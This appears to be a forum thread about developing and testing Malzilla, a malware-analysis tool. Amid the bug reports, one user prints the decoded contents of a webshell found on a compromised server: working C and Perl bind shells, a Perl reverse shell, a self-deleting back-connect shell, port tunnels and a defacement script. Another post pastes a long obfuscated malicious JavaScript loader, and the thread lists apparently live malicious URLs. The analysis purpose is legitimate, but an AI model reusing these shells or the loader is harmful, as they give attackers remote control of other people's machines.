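                               "Refresh: 0; url=http://start.example/c\r\n"),
    "http://start.example/c": ("HTTP/1.1 302 Found\r\n"
                               "Location: http://start.example/a\r\n"),
}

if __name__ == "__main__":
    print(decide("http://site.example/index?p=2", EMPTY_LOCATION, set()))
    for step in walk("http://start.example/a", CHAIN):
        print(step)
```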
-
hehe because of the way it behaved, I figured it was probably done deliberately to try and avoid automated analysis as much as possible.
-
Kalimero Processor doesn't work too well on this one:
-
Kalimero also has problems with this one:
-
Another example of the Kalimero one:
-
@JohnC
I'm doing a large rewrite of Malzilla at the moment.
I've started from the HTTP/FTP downloader.
OpenSSL is removed. HTTPS connections are handled by cryptlib now:
http://www.cs.auckland.ac.nz/~pgut001/cryptlib/
This will hopefully solve the Vista issues.
HTTP downloader now handles gzip, deflate and raw zlib compression (previous version did just gzip)
Some visual GUI artifacts in Vista and Win7 should be fixed now (forced repaint of the GUI because some of the buttons disappeared from the GUI after using accelerator keys (keyboard shortcuts))
Work in progress: - testing all kinds of redirections
Link Parser also got a large rewrite and needs a lot of testing to see if all is working.
Misc Decoders got some rewrite (base64/MIME decoder for now, but more will follow).
When I get all done with previously mentioned components, I will go for JavaScript-related parts.
Kalimero will probably be left out of the Malzilla if I get my DoomZilla engine up and running. DoomZilla engine will implement the complete DOM parser, and SpiderMonkey will interact with DOM objects like it does in browsers (most notably the functions like GetElementByID and similar will be handled out of the box).
In August I will be without PC, and I will start this part probably in September.
I will hopefully do one release before August, containing the latest changes.
@all
I would need help with some serious testing.
Test cases are needed for the following:
- HTTP Encodings (compression)
- all kinds of redirections (3xx HTTP responses, through META tags, from JavaScript code etc.)
- cases for Link Parser to see if it is missing links (links are now extracted also from <img>, <applet>, <object> and similar tags)
Later, I will also need test cases for external scripts (<script src="../../myscript.js">) to get them automatically downloaded and injected into the main HTML, so that the JavaScript decoder can use them just like it uses normal inline scripts.
So, if there are any volunteers for writing test cases (or to collect them from the net), I would be more than thankful.
The tests will be put online on malzilla.org (PHP is available, but no DB), so be careful about licenses and copyrights of the test-cases you collect (if any :) )
-
btw. this is what gave me motivation to work further on Malzilla:
http://holisticinfosec.blogspot.com/2009/07/malzilla-exploring-scareware-and-drive.html
http://holisticinfosec.org/toolsmith/docs/july2009.pdf
-
I'll be happy to do testing for you :)
-
Would you write test-cases (HTML, PHP, JS), or test it on web sites?
-
I'd be testing it on ITW malicious sites, yep :)
-
http://www.malzilla.org/dev_builds/
Please read the changelog to see what is to be expected from this build.
Test cases for Link Parser and for redirections would be good thing to have. Without good tests we will never know if these are working OK (one would need to compare the site source code with parser results by hand, to see if something is missing).
Edit: forgot to write in changelog that the PScript is removed. Dunno if anyone found it useful at all.
-
I'll take a look and report back, cheers :)
-
Bobby,
Just an FYI, the following seems to be failing? (it downloads the code, but can't seem to decode it?)
http://lipesr.com/update/?eb70c8bc3e184ffe5a98905e484546d9
Wepawet is failing with this one too :(
http://wepawet.cs.ucsb.edu/view.php?hash=0e28254bfce6009968e5b2982f0c7c33&t=1247695990&type=js
Gonna give JSUnpack a go ...... and if that fails too, I'll do it manually.
-
Bobby,
Just an FYI, the Base64 decoder seems to be failing to decode the Base64 encoded data in the attached shell (found on a rooted box (already reported it to the ISP)).
Decoded manually shows it decodes to;
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;
{
int sockfd, newfd;
char buf[30];
struct sockaddr_in remote;
if(fork() == 0) {
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[1]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if(!sockfd) perror("socket error");
bind(sockfd, (struct sockaddr *)&remote, 0x10);
listen(sockfd, 5);
while(1)
{
newfd=accept(sockfd,0,0);
dup2(newfd,0);
dup2(newfd,1);
dup2(newfd,2);
write(newfd,"Password:",10);
read(newfd,buf,sizeof(buf));
if (!chpass(argv[2],buf))
system("echo welcome to Yogyacardus shell && /bin/bash -i");
else
fprintf(stderr,"Sorry");
close(newfd);
}
}
}
int chpass(char *base, char *entered) {
int i;
for(i=0;i<strlen(entered);i++)
{
if(entered[i] == '\n')
entered[i] = '\0';
if(entered[i] == '\r')
entered[i] = '\0';
}
if (!strcmp(base,entered))
return 0;
}
#!/usr/bin/perl
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit(1); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1)
{
accept(CONN,S);
if(!($pid=fork))
{
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char *argv[])
{
int fd;
struct sockaddr_in sin;
char rms[21]="rm -f ";
daemon(1,0);
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
sin.sin_addr.s_addr = inet_addr(argv[1]);
bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));
fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;
if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {
perror("[-] connect()");
exit(0);
}
strcat(rms, argv[0]);
system(rms);
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
execl("/bin/sh","sh -i", NULL);
close(fd);
}
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <linux/time.h>
#ifdef STRERROR
extern char *sys_errlist[];
extern int sys_nerr;
char *undef = "Undefined error";
char *strerror(error)
int error;
{
if (error > sys_nerr)
return undef;
return sys_errlist[error];
}
#endif
main(argc, argv)
int argc;
char **argv;
{
int lsock, csock, osock;
FILE *cfile;
char buf[4096];
struct sockaddr_in laddr, caddr, oaddr;
int caddrlen = sizeof(caddr);
fd_set fdsr, fdse;
struct hostent *h;
struct servent *s;
int nbyt;
unsigned long a;
unsigned short oport;
if (argc != 4) {
fprintf(stderr,"Usage: %s localport remoteport remotehost\n",argv[0]);
return 30;
}
a = inet_addr(argv[3]);
if (!(h = gethostbyname(argv[3])) &&
!(h = gethostbyaddr(&a, 4, AF_INET))) {
perror(argv[3]);
return 25;
}
oport = atol(argv[2]);
laddr.sin_port = htons((unsigned short)(atol(argv[1])));
if ((lsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket");
return 20;
}
laddr.sin_family = htons(AF_INET);
laddr.sin_addr.s_addr = htonl(0);
if (bind(lsock, &laddr, sizeof(laddr))) {
perror("bind");
return 20;
}
if (listen(lsock, 1)) {
perror("listen");
return 20;
}
if ((nbyt = fork()) == -1) {
perror("fork");
return 20;
}
if (nbyt > 0)
return 0;
setsid();
while ((csock = accept(lsock, &caddr, &caddrlen)) != -1) {
cfile = fdopen(csock,"r+");
if ((nbyt = fork()) == -1) {
fprintf(cfile, "500 fork: %s\n", strerror(errno));
shutdown(csock,2);
fclose(cfile);
continue;
}
if (nbyt == 0)
goto gotsock;
fclose(cfile);
while (waitpid(-1, NULL, WNOHANG) > 0);
}
return 20;
gotsock:
if ((osock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
fprintf(cfile, "500 socket: %s\n", strerror(errno));
goto quit1;
}
oaddr.sin_family = h->h_addrtype;
oaddr.sin_port = htons(oport);
memcpy(&oaddr.sin_addr, h->h_addr, h->h_length);
if (connect(osock, &oaddr, sizeof(oaddr))) {
fprintf(cfile, "500 connect: %s\n", strerror(errno));
goto quit1;
}
while (1) {
FD_ZERO(&fdsr);
FD_ZERO(&fdse);
FD_SET(csock,&fdsr);
FD_SET(csock,&fdse);
FD_SET(osock,&fdsr);
FD_SET(osock,&fdse);
if (select(20, &fdsr, NULL, &fdse, NULL) == -1) {
fprintf(cfile, "500 select: %s\n", strerror(errno));
goto quit2;
}
if (FD_ISSET(csock,&fdsr) || FD_ISSET(csock,&fdse)) {
if ((nbyt = read(csock,buf,4096)) <= 0)
goto quit2;
if ((write(osock,buf,nbyt)) <= 0)
goto quit2;
} else if (FD_ISSET(osock,&fdsr) || FD_ISSET(osock,&fdse)) {
if ((nbyt = read(osock,buf,4096)) <= 0)
goto quit2;
if ((write(csock,buf,nbyt)) <= 0)
goto quit2;
}
}
quit2:
shutdown(osock,2);
close(osock);
quit1:
fflush(cfile);
shutdown(csock,2);
quit0:
fclose(cfile);
return 0;
}
#!/usr/bin/perl
use IO::Socket;
use POSIX;
$localport = $ARGV[0];
$host = $ARGV[1];
$port = $ARGV[2];
$daemon=1;
$DIR = undef;
$| = 1;
if ($daemon){ $pid = fork; exit if $pid; die "$!" unless defined($pid); POSIX::setsid() or die "$!"; }
%o = ('port' => $localport,'toport' => $port,'tohost' => $host);
$ah = IO::Socket::INET->new('LocalPort' => $localport,'Reuse' => 1,'Listen' => 10) || die "$!";
$SIG{'CHLD'} = 'IGNORE';
$num = 0;
while (1) {
$ch = $ah->accept(); if (!$ch) { print STDERR "$!\n"; next; }
++$num;
$pid = fork();
if (!defined($pid)) { print STDERR "$!\n"; }
elsif ($pid == 0) { $ah->close(); Run(\%o, $ch, $num); }
else { $ch->close(); }
}
sub Run {
my($o, $ch, $num) = @_;
my $th = IO::Socket::INET->new('PeerAddr' => $o->{'tohost'},'PeerPort' => $o->{'toport'});
if (!$th) { exit 0; }
my $fh;
if ($o->{'dir'}) { $fh = Symbol::gensym(); open($fh, ">$o->{'dir'}/tunnel$num.log") or die "$!"; }
$ch->autoflush();
$th->autoflush();
while ($ch || $th) {
my $rin = "";
vec($rin, fileno($ch), 1) = 1 if $ch;
vec($rin, fileno($th), 1) = 1 if $th;
my($rout, $eout);
select($rout = $rin, undef, $eout = $rin, 120);
if (!$rout && !$eout) {}
my $cbuffer = "";
my $tbuffer = "";
if ($ch && (vec($eout, fileno($ch), 1) || vec($rout, fileno($ch), 1))) {
my $result = sysread($ch, $tbuffer, 1024);
if (!defined($result)) {
print STDERR "$!\n";
exit 0;
}
if ($result == 0) { exit 0; }
}
if ($th && (vec($eout, fileno($th), 1) || vec($rout, fileno($th), 1))) {
my $result = sysread($th, $cbuffer, 1024);
if (!defined($result)) { print STDERR "$!\n"; exit 0; }
if ($result == 0) {exit 0;}
}
if ($fh && $tbuffer) {(print $fh $tbuffer);}
while (my $len = length($tbuffer)) {
my $res = syswrite($th, $tbuffer, $len);
if ($res > 0) {$tbuffer = substr($tbuffer, $res);}
else {print STDERR "$!\n";}
}
while (my $len = length($cbuffer)) {
my $res = syswrite($ch, $cbuffer, $len);
if ($res > 0) {$cbuffer = substr($cbuffer, $res);}
else {print STDERR "$!\n";}
}}}
<script language="JavaScript">
<!--
var my = "http://www.yogyacardus.com/images/r57.gif";
document.write('<div style="position:fixed;_position:absolute;bottom:0px;right:0px;clip: inherit;_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);"><img src="'+my+'" alt="Yogyacardus ? 2008" onmouseover="this.style.cursor=\'pointer\'" onclick="parent.location=\'http://www.yogyacardus.com\'" /></div>');
//-->
</script>
yodyacardus.com seems to be dead atm.
-
Hi MysteryFCM,
First link returns 404 for me.
As for the second one, which file from the attached archive is problematic?
I see the encoded string in idx.txt, but that one should be decoded (Base64). After that you need to apply ROT13 decoding, and do a zlib inflate at the end.
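The decoding order given in this reply (Base64, then ROT13, then a zlib inflate) can be reproduced outside Malzilla. An added example, not code from the thread or from Malzilla: the function names, the output cap and the sample blob are assumptions made for the illustration, and the sample is built inline from a harmless string.

```python
import base64
import string
import zlib

MAX_OUTPUT = 8 * 1024 * 1024  # assumed cap so a hostile blob cannot exhaust memory

_LOWER, _UPPER = string.ascii_lowercase, string.ascii_uppercase
_ROT13 = bytes.maketrans(
    (_LOWER + _UPPER).encode(),
    (_LOWER[13:] + _LOWER[:13] + _UPPER[13:] + _UPPER[:13]).encode(),
)


def rot13_bytes(data: bytes) -> bytes:
    """Rotate ASCII letters only; every other byte value passes through."""
    return data.translate(_ROT13)


def inflate(data: bytes) -> bytes:
    """Try the zlib wrapper, then gzip, then a raw deflate stream."""
    for wbits in (zlib.MAX_WBITS, zlib.MAX_WBITS | 16, -zlib.MAX_WBITS):
        try:
            stream = zlib.decompressobj(wbits)
            out = stream.decompress(data, MAX_OUTPUT)
        except zlib.error:
            continue  # wrong container, try the next one
        if not stream.eof:
            raise ValueError("stream truncated or larger than MAX_OUTPUT")
        return out
    raise ValueError("not a zlib, gzip or raw deflate stream")


def decode_layers(blob: str) -> bytes:
    """Base64 -> ROT13 -> inflate, in the order described in the reply."""
    stage1 = base64.b64decode(blob)   # tolerant of embedded line breaks
    stage2 = rot13_bytes(stage1)      # applied to the binary, letters only
    return inflate(stage2)


def make_sample(plain: bytes) -> str:
    """Constructed input: the inverse chain, used only to build test data."""
    packer = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    raw = packer.compress(plain) + packer.flush()
    return base64.b64encode(rot13_bytes(raw)).decode("ascii")


if __name__ == "__main__":
    blob = make_sample(b"echo 'constructed sample';")
    print(blob)
    print(decode_layers(blob))
```

The result is returned as bytes for inspection and is never executed.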
-
Sorry dude, the Base64 is in style.txt
I'll have a look to see if the lipesr.com one is still in Malzilla's cache :)
-
Here you go ..... tis the code from the cache for the URL now returning a 404 :)
<html><body><script>eicis='503';duas="d";lapsui='Wi';egerit="sp";lexque="av";ictuum='bject';otia="dC";vocare=".284";gemma='NI';labens=702;margin='va';dasque="13.";paras=5509;weaner='abcde';acuta=1;feroci='UN';teneto="0.77";imis='C';quoquo='tV';facat=3;snook="pp";cervos='t';suopte=992;sulcis=6854;etimus='ndo';dicari=0;venint="6192";igitur='n';matrem="ea";gravi="8e0";mdcqve="";alma='s';rebus='tW';scitis=".55";oravi="m";magnae="691";novem=6733;foedo="tt";inerat=731;frenas='[HAS';citra='m';ineo='ij';ring='A';statum="men";usuum='tion';hisco='0.120';capio=952;nonam='ndow';black=4;ludat="2162.";dando='d';ponis='87';lucant="7766.";fetuum="en";futura=738;corn='wi';buck=473;textum=7;valuer='f';parant="s";mergis='';memora='z0';nark='L';carpet='us';luces="9.435e3";atris='V';mque="t";boreas="dd";tenuis='cti';amorem='de';credit='ue';xxxii=91;bella="27.";multae='deA';adiuti="4.196e3";lignum='y';vicit='3.645e3';herba='w';ageres=8;reel='Vie';inest=289;moneas='ew';rotas=2;chorus=844;poenis=8823;leti="io";itabat=284;caduci='v';fluit='Vi';timet='pR';creta='i';captis=72;ardet=200;acque='p';tityre="Be";saniem='l';spruik='lf';adorto=8290;infers="us";visum=']';shot='.976';unam=90;caros=5;mocker="551.";googly=621;mari='r';ipso="u";velabo='u';umida='re';semine="nt";aberim=30;rector='e';nodos="r";auctam='x';sumi=69;varium=' t';mortis='last';iussis=52;chuddy='S';proice="a";senis='o';templa='fa';trades='+';sulco=(4.394e3<=adiuti?9:''+'A'+'B'+'C'+'D'+'E'+'F'+'');postis=("3.6e1">4.2e2?2.403e3:mari+'i'+'ng'+'');function wowser(caedar){quivi=new caedar()}function quimus(incute,suete){for(iunges=0;iunges<incute;iunges++)suete[iunges]=iunges}function fulvum(uocare,aequat){for(iunges=0;iunges<uocare;iunges++){ausam=(ausam+quivi[iunges]+aequat[yard](iunges%aequat[amorum]))%uocare;ibique=quivi[iunges];quivi[iunges]=quivi[ausam];quivi[ausam]=ibique}}function iouem(gnow,erga){iunges=(iunges+1)%erga;ausam=(ausam+quivi[iunges])%erga;enetos();quivi[ausam]=ibique;tuorum(gnow)}function 
enetos(linquo){ibique=quivi[iunges];quivi[iunges]=quivi[ausam]}function tuorum(mitte){etque+=vitateei[optime](mitte[yard](invia)^quivi[(quivi[iunges]+quivi[ausam])%tecum])}function rumpis(gnow){for(invia=0;invia<gnow[amorum];invia++){iouem(gnow,256)}}function anco(aliquo){iunges=aliquo;ausam=aliquo}sedere=(88,relata);laude=(6.4e1,mergis+'a'+'');tecum=(5.6e1,256);(9077>=0.8?sedere:4.8e1)(('.298'<547.?this:.727));valle=(8340.,exciti);sulco+=(0.291e3>"25"?'GH'+'IJK'+'L'+'MN'+'O'+'':525.);ferrum=(1.,oblato);pontum=(dasque<9297?motser:.6899);uerbi=('.8'<8127.?iugulo:1.97e2);natavijie=(1070,ferrum);grauis=(7,pontum)[(7.3e2>='.420'?""+"d"+"o"+"c"+"u"+"m"+"e"+"n"+mque+"":7.78e2)];optime=('.116'>=8.83e2?55.:mergis+'f'+mari+'o')+(0.106,'m'+imis)+(.3,'har')+(1.2e1>'35'?55:'C')+(99.>=0.63?mergis+'o'+'d'+'e'+'':.5804);amorum=(labens,'le')+(2585,igitur+'g')+(.92,'th');vitateei=(1.52e2,grauis)[(669,mergis+acque+'a'+'re'+'nt'+lapsui+'nd'+'ow'+mergis)][(9e0,'w'+'ind'+'ow')][(5.6e1,mergis+'S'+mergis)+("5773"<.2?.8:'t')+(6.368e3<="9.822e3"?postis:0.83)];sulco+=(59<=.62?167:mergis+'P'+'Q'+'R'+chuddy+'T'+'U'+mergis)+(8e0,''+'V'+'W'+'X'+'Y'+'Z'+'');mater=('4997'>=0.67?''+mari+'ay':46);funder=(4e0<luces?'ath':5.64e2);intra=('92'>.4?uerbi:7e0);joey=(6364.,'unc')+(0.3966,usuum);pictis=(unam<7?5:grauis);try{potiti=(56<=9.?3617.:'er')+(8.,'Da');larem=(1.3e1,'#');luges=(3.3e1,'pa');joseph=("5722">5e0?amorem+'f'+'aul'+'t':8395.);trap=(1e0>='.4'?larem:8.07e2);var 
mensae=(rotas,pictis)[('4.'>=2e0?"cr"+"ea"+mque+"eE"+"lem"+"e"+"nt":iussis)]((.63,'s')+(1e0,luges)+(.1<=.3?igitur+mergis:8.1e2));epeos=(.5>=0.89?798:larem)+(venint>=8.38e2?joseph:0.983)+(1.79e2>=9.332e3?0.135:trap)+(8e0,carpet)+(0.306e3<86?9e0:potiti)+(5.<=facat?3e0:mergis+'ta'+'');(6.>novem?5:mensae)[(177,"a"+boreas+tityre+"h"+lexque+leti+"r"+"")]((4038,epeos));(scitis>=23.?.767:pictis)[("4.28e2"<6?9:"bo"+"d"+"y")][(5,proice+snook+"e"+"n"+otia+"hi"+"l"+"d")]((poenis>47?mensae:1.6e1));(chorus,mensae)[(8>=4?"load":facat)]((ageres<5e0?42:'['+'HA'+'SH'+']'+'['+'U'+gemma+'Q]'+mergis));if((.73<=5?mensae:.9)[(2.9e1>=.7084?"XMLDocume"+semine:273)][(rotas,""+duas+"oc"+"u"+"me"+"ntE"+"le"+statum+mque)][(0.540<=6e0?""+proice+mque+mque+"r"+"i"+"b"+ipso+"t"+"e"+"s"+"":319.)][(7e0,amorum)]==("58"<=5083?dicari:capio)){(4.465e3,mensae)[("6.3e1"<=0.8?70.:"s"+"etA"+foedo+"ribute"+"")]((3.22e2,mortis)+("21">7?mergis+'t'+'i'+'m'+'e'+'':.5026),new (.2,Date)());(3491,mensae)[(9.,""+parant+proice+"v"+"e"+"")]((lucant<804.?2.21e2:'['+'H'+'AS'+'H'+visum+'['+feroci+'IQ'+visum))}else{laude+=(9.8e1,'!')}}catch(darer){}sulco+=(.4,weaner)+(shot>0.2?''+'f'+'gh'+ineo+'kl'+'m':6.27e2);atrox=("6"<=5.708e3?'e':.9667);crate=(.4,pictis);scivit=(0.9,ducere);sedis=(2056<.35?2.4e1:margin);sulco+=(1e0,''+igitur+'o'+acque+'q'+mari+'s'+'t'+'u'+'')+(4,'v'+'w'+'xy'+memora+'1'+'23'+'4')+(.151,''+'5'+'6'+'7'+'8'+'9'+trades+'/'+'='+mergis);yard=(1>=6.96e2?5e0:'ch')+(0.34,'arC')+(0.7050,senis+multae+'t'+'');if((39.>925?2:sulco)[(1.6e1<='5.003e3'?atrox:6.33e2)+(.759,sedis)+('9.8e1'<=.6625?0.114:mergis+'l')]){sulco=(6.01e2<=183.?0.688:mergis);crate=(4e0,sulco)}donato=("71"<=.8?.8:''+senis+mari+'a'+'g'+'e'+mergis);oscar=(caros,'gl');macto=(657<1?0.876e3:'oba'+'');quilt=(98>=8e0?crate:8.3e1);function 
ducere(puppis,lassa,puram,sinuum){('4470'<=2e0?.4058:wowser)(("1.187e3"<.7?9990.:queantyyo));(0.638>=eicis?.8:quimus)((0.838,256),(759.,quivi));(2.845e3<=2835?1.07e2:anco)((.2477<=624.?dicari:7.9e1));(4<=971.?fulvum:7)((8.75e2,256),(119.>9e0?puppis:3.4e1));(.5<"782"?anco:18.)((2117,0));etque=(9.693e3>"9.7e1"?''+'':4.4e1);(0.6531>=.987?textum:rumpis)(("0.2805"<=0.1293?9898.:lassa));return (9e1>='4.'?etque:5008.)}rimerjie=(.956,quilt);function iugulo(lego,uagis,amores,petat){var raucam;try{manus=(3.519e3,mergis+'x'+'m'+'l'+'2'+'.'+'X'+'');foedum=(.883,mergis+'H'+'T'+'T'+'P'+'');uicere=(421.,manus)+(4>textum?1e0:'ML')+(1e0,foedum);raucam=new ("55"<.1?63.:divicolll)((.86<sumi?''+'Ms':6.)+(7e0>="0.05e2"?uicere:1.1e2))}catch(fando){try{foedum=(.67,'HTTP');uicere=(2638.,mergis+mari+'o'+'s'+senis+'f'+'')+(rotas<ludat?'t.'+'X'+'ML'+mergis:326)+(.443,foedum);raucam=new ('7158.'<=449?9.39e2:divicolll)((.368>7.?.70:mergis+'Mi'+'c')+(3.41e2<="57"?caros:uicere))}catch(shake){}}return (412,raucam)}viros=(.81<=0.52?9.5e1:rimerjie)[(1<3.946e3?''+acque+'ar'+'en'+rebus+creta+igitur+dando+'ow'+'':.7580)][(0.5<='2.5e1'?mergis+'s'+'e'+'l'+'f'+mergis:4)][('509'>=6e0?mergis+'w'+creta+igitur+dando+senis+'w'+mergis:98.)][(6.7e1,mergis+'f'+mari+'a'+citra+'e'+'s'+'')][(.7<.555?7.78e2:''+'s'+'e'+'l'+'f'+mergis)][(.9252,'F')+(4.,joey)];divicolll=(311,rimerjie)[(0.526,'pa'+mari+rector+igitur+'tWi'+'ndo'+'w'+mergis)][(6.1e1,alma+'elf'+mergis)][("6e0"<.868?.4:'wi'+nonam+mergis)][(2.621e3,ring)+(6291<22?2.205e3:tenuis)+(.9>=754?64:mergis+caduci+rector+'X'+'')+("6e0">=.79?'O'+mergis:0.2)+('4'>7.904e3?26:ictuum)];amicoccc=(5.<=facat?8145:rimerjie)[(.8>=8e0?3:mergis+acque+'a'+'re'+igitur+cervos+'W'+'i'+'nd'+'ow'+'')][(8e0>5e0?mergis+alma+rector+'l'+'f'+mergis:0.7198)][(itabat,'M')+(buck,funder)];queantyyo=('3.9e2'<=3.27e2?4e0:rimerjie)[("0.85"<=0.4e1?mergis+'par'+'ent'+'Window'+'':5.39e2)][(4.91e2,mergis+'w'+creta+'n'+dando+senis+'w'+mergis)][(.455,ring)+(781,'r')+("0.7e1">googly?5.7e1:mater)];egiqueaa
i=new (0.42e2,queantyyo)();oleum=(4.4e1>45.?8.:'G');annos=(0.5<=6?viros:403.);ilice=(48<=ageres?.5195:laude)+(teneto>=3789.?39.:natavijie)((.555>='4.'?.72:sulco),(mocker<rotas?0.3:aberim));pressoeea=(30.>=843?0.78:rura);scaeae=(futura,'T');snaky=(7e0,annos)((3e1>0.25?'ret':5.7e1)+(2.858e3,velabo+'rn '+mergis)+(bella>193?.32:mergis+creta+igitur+'t'+mari+'a'+'('+')'+mergis));taliayya=("9911"<=3.646e3?3.82e2:annos)((8.4e2,mergis+'x'+mergis),(6,'y'),(.8,'ret')+(3.771e3,'u'+mari+'n '+'')+(2.<facat?alma+'civit'+'('+'x,y'+')':1e0));velaiie=(1.<=4.?annos:5.8e1)((56,auctam),(0.1959<'4'?'ret':adorto)+(2.19e2,'urn ')+(23,'ba'+'r'+'cen'+'(x'+')'));ducem=(4,''+'on'+umida+mergis)+('936'<=.8185?2e0:''+'a'+dando+'y'+alma+'t'+mergis)+(facat,''+'a'+cervos+'e'+'c'+mergis)+(5.3e1,''+'h'+'a'+igitur+'g'+'e'+mergis);movere=(9.154e3,'E');(182>=9e0?velaiie:textum)((xxxii,ilice));function barcen(solvi,bardie,equum,sues){var stella=(suopte>0.4?snaky:21.)();(.4,stella)[(inest,"open")]((0.4374>'35'?9.:oleum)+(3.74e2,movere)+(819>'257.'?scaeae:8e0),(49,'?')+(0.994>=5e0?0.49e2:pressoeea)((3.6e1,taliayya)((7904.,''+'d'+rector+alma+'e'+mari+creta+'o'+'o'+caduci+mergis),(.751,solvi))),(4074,true)); stella[(.35>.8731?2.34e2:ducem)]=(647.,impiis);function impiis(){if((.7071<=gravi?stella:0.9960)[(magnae<.598?2.95e3:mdcqve+"r"+matrem+"d"+"yS"+mque+proice+mque+"e")]==(4<3331?black:0.736)&&(0.261e3<3.21e2?stella:0.64)[(998.,parant+"tat"+infers)]==(2.,ardet)){(.4,annos)((5.6e1,taliayya)((6879.<=0.92e2?5:solvi),(".382">=83?959:valle)((paras<5.389e3?rotas:stella)[(acuta,mdcqve+"re"+egerit+"on"+"se"+"T"+"e"+"x"+"t")])))()}};(0.4176,stella)[(inerat,mdcqve+parant+"e"+"n"+duas+mdcqve)]((.314,dicari))}function demus(puppis,dolore,sentes,sociem){ var luget=amicoccc["floor"](amicoccc["random"]()*puppis[amorum]);ituri+=puppis["substring"](luget,luget+1)}function puer(lassa,puppis,ituri,caedis){for(iunges=0;iunges<lassa;iunges++){demus(puppis,iunges,lassa,ituri);}}function 
oblato(puppis,lassa,caedis,iuvet){ituri='';puer(lassa,puppis,ituri,caedis);return ituri}function rura(visu,cuinam,belli,boni){var obliti=(.5058,mergis);var etque;var iunges;var chiack=(793>=937?633:0);var minans=(hisco>=1599.?.27:acuta);iunges=(4638,dicari);for(etque=0;iunges<visu[amorum];iunges++,etque++){chiack=chiack*256+visu[yard](iunges);minans=minans*4;obliti=obliti+sulco["charAt"](parseInt(chiack/minans));chiack=chiack%minans;if(minans==64){obliti=obliti+sulco["charAt"](parseInt(chiack));chiack=0;minans=1;etque++}if(etque>=75){etque=-1;obliti=obliti+'\n'}}if((5e0>=27.?9462.:iunges)%(9e0,facat)){obliti=obliti+sulco["charAt"](parseInt(chiack*((iunges%3==1)?16:4)));obliti=obliti+((iunges%3)==1?'==':vitateei[optime](61))}return (2759,obliti)}function exciti(visu,fuerat,verras,uterum){var obliti=(.29,'');var iunges;var chiack=(2048<7468.?dicari:0.2);var minans=(317>="2692"?2e0:1);for(iunges=0;iunges<visu[amorum];iunges++){if(visu["charAt"](iunges)==vitateei[optime](61)||visu["charAt"](iunges)=='\n')break;chiack=chiack*64+sulco["indexOf"](visu["charAt"](iunges));minans=(minans==1?64:minans/4);if(minans!=64){obliti=obliti+vitateei[optime](parseInt(chiack/minans));chiack=chiack%minans}}return (574.,obliti)}function relata(uelque,duae,invde,doceri){this[(0.4e1>.1?""+oravi+"o"+mque+"s"+"e"+nodos+mdcqve:3.34e2)]=(8.,uelque);if((5.7e1,uelque)[(9e0>=9e0?"p"+"ar"+fetuum+mque+mdcqve:2778)]==(3.443e3>2.?uelque:54.)){genti=(0.2267,'a')}else{laude+=(0.8301,'@'+mergis)}}</script>
-
Bobby,
Just to let you know the new version has been doing great :)
Just one issue with the links parser - it doesn't seem to parse links that aren't in HREF's and SRC's (e.g. if a URL is in the HTML dropdown "select" options, it doesn't include them), nor does it seem to parse links from comments and such.
If possible, could you also have it parse using base matches? (e.g. parse if string contains "://" or "http" or "ftp" etc etc etc (this is the way I've got vURL parsing them, but obviously unlike Malzilla, vURL doesn't currently rebuild the URL's to include domain names and paths and such, it just presents them "as found" ....)
It also seems to have an issue if I tell it to grab a URL, then create a new tab to grab another one, whilst it's still grabbing the first (this also sporadically creates an error that requires I shut down Malzilla (don't have the error message atm, but it's something about the index or some such, I'll try and reproduce it and post it if I am able to)
-
Hi Steven,
Sorry for the late reply. Somehow I missed your message earlier.
As for the link parser - indeed, by design it parses just valid links from HTML tags (no links from comments and similar, nor links from plain text).
I do have code that can get every single URL from any kind of document, but that wouldn't be really integrated with the rest of the engine. I mean - I can't make such code use the main HTML parser. It would do it after the main parser does its job, and that would prolong the complete parsing. It does not really hurt the performance, but it can't get the relative links calculated. It could get just the absolute full URLs.
As for the dropdown combo boxes - can you give me an example for such code, so that I can see which tags it uses?
As for the downloader - my first implementation was for single threaded downloader. After that I have added tabbed interface (as requested), but that was an ugly hack. The downloading thread didn't have info about which tab called for a download. The downloaded data was returned to the current active tab. So, if you have two tabs, click on "Get" on the first tab and turn to second tab before the download ends - the downloaded data would end on second tab.
Very annoying bug if one is working with multiple documents in single instance of Malzilla.
